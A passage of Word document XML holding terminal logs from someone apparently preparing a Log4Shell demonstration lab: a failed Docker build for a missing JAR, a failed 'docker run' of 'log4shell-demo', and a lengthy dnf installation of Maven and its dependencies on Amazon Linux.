    <w:p w14:paraId="15210C7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=&gt; =&gt; transferring dockerfile: 320B                                                                                      0.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE744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=&gt; [internal] load metadata for docker.io/library/openjdk:17-jdk-slim                                                    0.5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56309A7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=&gt; [internal] load .dockerignore                                                                                         0.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1BE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=&gt; =&gt; transferring context: 2B                                                                                           0.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A08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=&gt; [internal] load build context                                                                                         0.2s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00D1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=&gt; =&gt; transferring context: 2B                                                                                           0.1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361CA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=&gt; [stage-1 1/2] FROM docker.io/library/openjdk:17-jdk-slim@sha256:aaa3b3cb27e3e520b8f116863d0580c438ed55ecfa0bc126b41f  8.3s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4A3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=&gt; =&gt; resolve docker.io/library/openjdk:17-jdk-slim@sha256:aaa3b3cb27e3e520b8f116863d0580c438ed55ecfa0bc126b41f68c3f62f  0.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0E9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=&gt; =&gt; sha256:37cb44321d0423bc57266a3bff658daf00478e4cdf2d3b8091f785310534256d 4.80kB / 4.80kB                            0.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C8F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=&gt; =&gt; sha256:1fe172e4850f03bb45d41a20174112bc119fbfec42a650edbbd8491aee32e3c3 31.38MB / 31.38MB                          0.8s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619856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=&gt; =&gt; sha256:44d3aa8d076675d49d85180b0ced9daef210fe4fdff4bdbb422b9cf384e591d0 1.58MB / 1.58MB                            0.3s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3A00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=&gt; =&gt; sha256:6ce99fdf16e86bd02f6ad66a0e1334878528b5a4b5487850a76e0c08a7a27d56 187.90MB / 187.90MB                        3.5s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839BB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=&gt; =&gt; sha256:aaa3b3cb27e3e520b8f116863d0580c438ed55ecfa0bc126b41f68c3f62f9774 547B / 547B                                0.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D459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=&gt; =&gt; sha256:779635c0c3d23cc8dbab2d8c1ee4cf2a9202e198dfc8f4c0b279824d9b8e0f22 953B / 953B                                0.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127502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=&gt; =&gt; extracting sha256:1fe172e4850f03bb45d41a20174112bc119fbfec42a650edbbd8491aee32e3c3                                 3.0s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD83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=&gt; =&gt; extracting sha256:44d3aa8d076675d49d85180b0ced9daef210fe4fdff4bdbb422b9cf384e591d0                                 0.1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA20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=&gt; =&gt; extracting sha256:6ce99fdf16e86bd02f6ad66a0e1334878528b5a4b5487850a76e0c08a7a27d56                                 4.1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B077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=&gt; ERROR [stage-1 2/2] COPY target/*.jar app.jar                                                                         0.1s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E427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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D53B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&gt; [stage-1 2/2] COPY target/*.jar app.jar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D630B0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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAAB4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Dockerfile:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE806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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463DF7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8 |     FROM openjdk:17-jdk-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5253431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9 |     VOLUME /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F42DA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10 | &gt;&gt;&gt; COPY target/*.jar app.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8ED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11 |     ENTRYPOINT ["java", "-jar", "/app.jar"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1146AA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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1086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failed to solve: lstat /var/lib/docker/tmp/buildkit-mount2274428878/target: no such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC0A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docker images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1AF1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REPOSITORY        TAG       IMAGE ID       CREATED       SIZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE1A0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ubuntu            latest    a0e45e2ce6e6   4 weeks ago   78.1MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192A4A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osixia/openldap   latest    31d1d6e16394   4 years ago   257MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068936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docker run -p 8080:8080 log4shell-demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59023B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Unable to find image 'log4shell-demo:latest' locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0A5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docker: Error response from daemon: pull access denied for log4shell-demo, repository does not exist or may require 'docker login': denied: requested access to the resource is denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA822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See 'docker run --help'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F32BFE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./mvnw clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7FD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-bash: ./mvnw: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD033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-v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B79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-bash: mvn: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BFF3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sudo dnf install -y maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288AA25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Last metadata expiration check: 1 day, 0:06:35 ago on Tue May 27 23:03:08 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6981E6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Dependencies resolved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B03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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F727F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Package                                          Architecture    Version                           Repository            Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068E38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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1919AB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Installing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C274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maven                                            noarch          1:3.8.4-3.amzn2023.0.5            amazonlinux           18 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F26C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Installing dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D43EA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alsa-lib                                         x86_64          1.2.7.2-1.amzn2023.0.2            amazonlinux          504 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C0D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apache-commons-cli                               noarch          1.5.0-3.amzn2023.0.3              amazonlinux           76 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F88F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apache-commons-codec                             noarch          1.15-6.amzn2023.0.3               amazonlinux          303 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB7AB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apache-commons-io                                noarch          1:2.8.0-7.amzn2023.0.4            amazonlinux          284 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C036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apache-commons-lang3                             noarch          3.12.0-7.amzn2023.0.3             amazonlinux          559 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A48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atinject                                         noarch          1.0.5-3.amzn2023.0.3              amazonlinux           23 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0578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cairo                                            x86_64          1.18.0-4.amzn2023.0.1             amazonlinux          718 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF883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cdi-api                                          noarch          2.0.2-6.amzn2023.0.3              amazonlinux           54 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD375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dejavu-sans-fonts                                noarch          2.37-16.amzn2023.0.2              amazonlinux          1.3 M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D168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dejavu-sans-mono-fonts                           noarch          2.37-16.amzn2023.0.2              amazonlinux          467 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49901F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dejavu-serif-fonts                               noarch          2.37-16.amzn2023.0.2              amazonlinux          1.0 M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391ACD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fontconfig                                       x86_64          2.13.94-2.amzn2023.0.2            amazonlinux          273 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544FD8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fonts-filesystem                                 noarch          1:2.0.5-12.amzn2023.0.2           amazonlinux          9.5 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162261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freetype                                         x86_64          2.13.2-5.amzn2023.0.1             amazonlinux          423 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF974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google-guice                                     noarch          4.2.3-8.amzn2023.0.6              amazonlinux          473 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60017C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google-noto-fonts-common                         noarch          20201206-2.amzn2023.0.2           amazonlinux           15 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423C9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google-noto-sans-vf-fonts                        noarch          20201206-2.amzn2023.0.2           amazonlinux          492 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8EE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graphite2                                        x86_64          1.3.14-7.amzn2023.0.2             amazonlinux           97 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F31B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guava                                            noarch          31.0.1-3.amzn2023.0.6             amazonlinux          2.4 M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446714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harfbuzz                                         x86_64          7.0.0-2.amzn2023.0.2              amazonlinux          873 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419882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httpcomponents-client                            noarch          4.5.13-4.amzn2023.0.4             amazonlinux          657 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CFAF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httpcomponents-core                              noarch          4.4.13-6.amzn2023.0.3             amazonlinux          632 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F5F7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jakarta-annotations                              noarch          1.3.5-13.amzn2023.0.3             amazonlinux           46 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D46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jansi                                            x86_64          2.4.0-3.amzn2023.0.3              amazonlinux          113 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2364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java-17-amazon-corretto-devel                    x86_64          1:17.0.15+6-1.amzn2023.1          amazonlinux          142 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E444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java-17-amazon-corretto-headless                 x86_64          1:17.0.15+6-1.amzn2023.1          amazonlinux           91 M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32F8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javapackages-filesystem                          noarch          6.0.0-7.amzn2023.0.6              amazonlinux           12 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6A95E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jcl-over-slf4j                                   noarch          1.7.32-3.amzn2023.0.4             amazonlinux           25 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05931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jsoup                                            noarch          1.16.1-4.amzn2023.0.2             amazonlinux          433 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7A6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jsr-305                                          noarch          3.0.2-5.amzn2023.0.4              amazonlinux           32 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA276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langpacks-core-font-en                           noarch          3.0-21.amzn2023.0.4               amazonlinux           10 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2561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libX11                                           x86_64          1.8.10-2.amzn2023.0.1             amazonlinux          659 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5728733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libX11-common                                    noarch          1.8.10-2.amzn2023.0.1             amazonlinux          147 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9D31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libXau                                           x86_64          1.0.11-6.amzn2023.0.1             amazonlinux           33 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5083CA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libXext                                          x86_64          1.3.6-1.amzn2023.0.1              amazonlinux           42 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF6FD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libXrender                                       x86_64          0.9.11-6.amzn2023.0.1             amazonlinux           29 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2060FAB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libbrotli                                        x86_64          1.0.9-4.amzn2023.0.2              amazonlinux          315 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F4D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libjpeg-turbo                                    x86_64          2.1.4-2.amzn2023.0.5              amazonlinux          190 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC78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libpng                                           x86_64          2:1.6.37-10.amzn2023.0.6          amazonlinux          128 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6462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libxcb                                           x86_64          1.17.0-1.amzn2023.0.1             amazonlinux          235 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B53F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maven-amazon-corretto17                          noarch          1:3.8.4-3.amzn2023.0.5            amazonlinux          9.4 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B706B6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maven-lib                                        noarch          1:3.8.4-3.amzn2023.0.5            amazonlinux          1.5 M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5AF0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maven-resolver                                   noarch          1:1.7.3-3.amzn2023.0.4            amazonlinux          557 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA975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maven-shared-utils                               noarch          3.3.4-4.amzn2023.0.3              amazonlinux          152 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FFC3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maven-wagon                                      noarch          3.4.2-6.amzn2023.0.4              amazonlinux          113 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05059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pixman                                           x86_64          0.43.4-1.amzn2023.0.4             amazonlinux          296 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B493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plexus-cipher                                    noarch          1.8-3.amzn2023.0.3                amazonlinux           27 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D61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plexus-classworlds                               noarch          2.6.0-10.amzn2023.0.4             amazonlinux           61 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB12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plexus-containers-component-annotations          noarch          2.1.0-9.amzn2023.0.4              amazonlinux           19 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C388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plexus-interpolation                             noarch          1.26-10.amzn2023.0.4              amazonlinux           80 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C183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plexus-sec-dispatcher                            noarch          2.0-3.amzn2023.0.3                amazonlinux           34 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED64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plexus-utils                                     noarch          3.3.0-9.amzn2023.0.4              amazonlinux          254 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824E0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publicsuffix-list                                noarch          20240212-61.amzn2023              amazonlinux           89 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF1A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sisu                                             noarch          1:0.3.4-9.amzn2023.0.4            amazonlinux          510 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492F7E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slf4j                                            noarch          1.7.32-3.amzn2023.0.4             amazonlinux           70 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E146E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xml-common                                       noarch          0.6.3-56.amzn2023.0.2             amazonlinux           32 k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBB62B" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB8679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Transaction Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066AC8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A521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Install  57 Packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9A5D6" w14:textId="77777777" w:rsidR="009B72F7" w:rsidRPr="009B72F7" w:rsidRDefault="009B72F7" w:rsidP="009B72F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5BD9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Total download size: 109 M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BFB6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Installed size: 273 M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CC70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Packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F145B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(1/57): alsa-lib-1.2.7.2-1.amzn2023.0.2.x86_64.rpm                                             7.4 MB/s | 504 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF436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(2/57): apache-commons-cli-1.5.0-3.amzn2023.0.3.noarch.rpm                                     548 kB/s |  76 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E5CB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(3/57): apache-commons-codec-1.15-6.amzn2023.0.3.noarch.rpm                                    2.0 MB/s | 303 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB446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(4/57): apache-commons-io-2.8.0-7.amzn2023.0.4.noarch.rpm                                      2.5 MB/s | 284 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1392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(5/57): atinject-1.0.5-3.amzn2023.0.3.noarch.rpm                                               688 kB/s |  23 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEED6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(6/57): cdi-api-2.0.2-6.amzn2023.0.3.noarch.rpm                                                1.4 MB/s |  54 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA36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(7/57): cairo-1.18.0-4.amzn2023.0.1.x86_64.rpm                                                  12 MB/s | 718 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD5F5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(8/57): apache-commons-lang3-3.12.0-7.amzn2023.0.3.noarch.rpm                                  4.1 MB/s | 559 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4189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(9/57): dejavu-sans-mono-fonts-2.37-16.amzn2023.0.2.noarch.rpm                                 6.8 MB/s | 467 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1656799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(10/57): fontconfig-2.13.94-2.amzn2023.0.2.x86_64.rpm                                          4.3 MB/s | 273 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8333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(11/57): dejavu-sans-fonts-2.37-16.amzn2023.0.2.noarch.rpm                                     8.3 MB/s | 1.3 MB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59B9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(12/57): fonts-filesystem-2.0.5-12.amzn2023.0.2.noarch.rpm                                     460 kB/s | 9.5 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2719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(13/57): dejavu-serif-fonts-2.37-16.amzn2023.0.2.noarch.rpm                                    7.7 MB/s | 1.0 MB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B97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(14/57): freetype-2.13.2-5.amzn2023.0.1.x86_64.rpm                                             9.6 MB/s | 423 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AEB8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(15/57): google-noto-fonts-common-20201206-2.amzn2023.0.2.noarch.rpm                           629 kB/s |  15 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2F40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(16/57): graphite2-1.3.14-7.amzn2023.0.2.x86_64.rpm                                            3.5 MB/s |  97 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B814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(17/57): google-noto-sans-vf-fonts-20201206-2.amzn2023.0.2.noarch.rpm                           10 MB/s | 492 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F52E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(18/57): google-guice-4.2.3-8.amzn2023.0.6.noarch.rpm                                          3.6 MB/s | 473 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54127DE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(19/57): harfbuzz-7.0.0-2.amzn2023.0.2.x86_64.rpm                                               13 MB/s | 873 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647560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(20/57): guava-31.0.1-3.amzn2023.0.6.noarch.rpm                                                 13 MB/s | 2.4 MB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE87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(21/57): jakarta-annotations-1.3.5-13.amzn2023.0.3.noarch.rpm                                  1.5 MB/s |  46 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0AA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(22/57): httpcomponents-core-4.4.13-6.amzn2023.0.3.noarch.rpm                                  3.2 MB/s | 632 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649CB8B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(23/57): httpcomponents-client-4.5.13-4.amzn2023.0.4.noarch.rpm                                2.8 MB/s | 657 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6690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(24/57): jansi-2.4.0-3.amzn2023.0.3.x86_64.rpm                                                 950 kB/s | 113 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C196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(25/57): javapackages-filesystem-6.0.0-7.amzn2023.0.6.noarch.rpm                               509 kB/s |  12 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AEE2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(26/57): java-17-amazon-corretto-devel-17.0.15+6-1.amzn2023.1.x86_64.rpm                       1.3 MB/s | 142 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712CB3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(27/57): jcl-over-slf4j-1.7.32-3.amzn2023.0.4.noarch.rpm                                       394 kB/s |  25 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE4EA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(28/57): jsr-305-3.0.2-5.amzn2023.0.4.noarch.rpm                                               794 kB/s |  32 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF2D1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(29/57): langpacks-core-font-en-3.0-21.amzn2023.0.4.noarch.rpm                                 557 kB/s |  10 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705471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(30/57): jsoup-1.16.1-4.amzn2023.0.2.noarch.rpm                                                3.1 MB/s | 433 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7283F57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(31/57): libX11-1.8.10-2.amzn2023.0.1.x86_64.rpm                                                13 MB/s | 659 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6DD7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(32/57): libX11-common-1.8.10-2.amzn2023.0.1.noarch.rpm                                        2.8 MB/s | 147 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3370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(33/57): libXau-1.0.11-6.amzn2023.0.1.x86_64.rpm                                               1.0 MB/s |  33 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1DA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(34/57): libXrender-0.9.11-6.amzn2023.0.1.x86_64.rpm                                           1.4 MB/s |  29 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E0E45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(35/57): libXext-1.3.6-1.amzn2023.0.1.x86_64.rpm                                               1.8 MB/s |  42 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A496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(36/57): libjpeg-turbo-2.1.4-2.amzn2023.0.5.x86_64.rpm                                         2.1 MB/s | 190 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C363A9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(37/57): libbrotli-1.0.9-4.amzn2023.0.2.x86_64.rpm                                             3.1 MB/s | 315 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4772FD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(38/57): libpng-1.6.37-10.amzn2023.0.6.x86_64.rpm                                              4.8 MB/s | 128 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166F8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(39/57): libxcb-1.17.0-1.amzn2023.0.1.x86_64.rpm                                               4.6 MB/s | 235 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D4C8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(40/57): maven-3.8.4-3.amzn2023.0.5.noarch.rpm                                                 646 kB/s |  18 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7D4B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(41/57): maven-amazon-corretto17-3.8.4-3.amzn2023.0.5.noarch.rpm                               215 kB/s | 9.4 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C38EE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(42/57): maven-resolver-1.7.3-3.amzn2023.0.4.noarch.rpm                                        2.5 MB/s | 557 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D38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(43/57): maven-lib-3.8.4-3.amzn2023.0.5.noarch.rpm                                             4.6 MB/s | 1.5 MB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51780D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(44/57): maven-shared-utils-3.3.4-4.amzn2023.0.3.noarch.rpm                                    1.5 MB/s | 152 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A98B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(45/57): pixman-0.43.4-1.amzn2023.0.4.x86_64.rpm                                               7.1 MB/s | 296 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54628EA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(46/57): maven-wagon-3.4.2-6.amzn2023.0.4.noarch.rpm                                           1.1 MB/s | 113 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640770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(47/57): plexus-cipher-1.8-3.amzn2023.0.3.noarch.rpm                                           806 kB/s |  27 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8574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(48/57): plexus-containers-component-annotations-2.1.0-9.amzn2023.0.4.noarch.rpm               493 kB/s |  19 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1F7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(49/57): plexus-classworlds-2.6.0-10.amzn2023.0.4.noarch.rpm                                   781 kB/s |  61 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFEED2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(50/57): plexus-interpolation-1.26-10.amzn2023.0.4.noarch.rpm                                  768 kB/s |  80 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC1B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(51/57): plexus-sec-dispatcher-2.0-3.amzn2023.0.3.noarch.rpm                                   364 kB/s |  34 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E8C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(52/57): plexus-utils-3.3.0-9.amzn2023.0.4.noarch.rpm                                          2.1 MB/s | 254 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F163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(53/57): publicsuffix-list-20240212-61.amzn2023.noarch.rpm                                     760 kB/s |  89 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317612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(54/57): sisu-0.3.4-9.amzn2023.0.4.noarch.rpm                                                  5.3 MB/s | 510 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F8E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(55/57): xml-common-0.6.3-56.amzn2023.0.2.noarch.rpm                                           769 kB/s |  32 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D84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(56/57): slf4j-1.7.32-3.amzn2023.0.4.noarch.rpm                                                588 kB/s |  70 kB     00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5EBE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(57/57): java-17-amazon-corretto-headless-17.0.15+6-1.amzn2023.1.x86_64.rpm                     38 MB/s |  91 MB     00:02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAE2D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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E26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Total                                                                                           34 MB/s | 109 MB     00:03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B6C4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Running transaction check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF4ED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Transaction check succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757135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Running transaction test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E7D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Transaction test succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7980E96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Running transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618670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Preparing        :                                                                                                       1/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AA4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javapackages-filesystem-6.0.0-7.amzn2023.0.6.noarch                                                  1/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC6D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fonts-filesystem-1:2.0.5-12.amzn2023.0.2.noarch                                                      2/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FCE2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dejavu-sans-mono-fonts-2.37-16.amzn2023.0.2.noarch                                                   3/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94EA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dejavu-sans-fonts-2.37-16.amzn2023.0.2.noarch                                                        4/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150538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libpng-2:1.6.37-10.amzn2023.0.6.x86_64                                                               5/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04564F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dejavu-serif-fonts-2.37-16.amzn2023.0.2.noarch                                                       6/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E437D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Running scriptlet: xml-common-0.6.3-56.amzn2023.0.2.noarch                                                              7/57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3ED0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xml-common-0.6.3-56.amzn2023.0.2.noarch                                                              7/57</w:t>
      </w:r>
    </w:p>
